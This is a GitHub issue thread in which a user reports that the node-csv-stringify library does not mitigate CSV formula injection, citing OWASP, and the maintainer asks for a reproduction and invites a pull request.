adaltas / node-csv-stringify

CSV stringifier implementing the Node.js `stream.Transform` API
https://csv.js.org/stringify/
186 stars 52 forks source link

SECURITY: CSV formular Injection #126

Closed ghost closed 3 years ago

ghost commented 3 years ago

See https://owasp.org/www-community/attacks/CSV_Injection for details.

But this is basically how the https://gitlab.com/lucaapp was used in germany to extract sensitive data. See https://twitter.com/mame82/status/1397425075654168576 for the original repost

It was checked that this library is not doing any kind of mitigation (neither with encoding these kind of cells as string nor with making sure that these kind of cells don't exist)

wdavidw commented 3 years ago

Could you provide an example replicating the issue and describe the solution you propose. This library is about creating generic CSV files, not preparing CSV file for a specific usage like for Excel. For those usages, I am not against providing an option to prevent certain data to match a set rules.

ghost commented 3 years ago

Could you provide an example replicating the issue

Please check owasp for more information about details

describe the solution you propose.

You are the developer and have to provide the solution. But you can check owasp for some examples.

This library is about creating generic CSV files, not preparing CSV file for a specific usage like for Excel

There are other tools which parse it the same way (libreoffice, google docs, collabora, ...)

wdavidw commented 3 years ago

You are the developer and have to provide the solution.

If I get paid for it. Otherwise, feel free to contribute a pull request.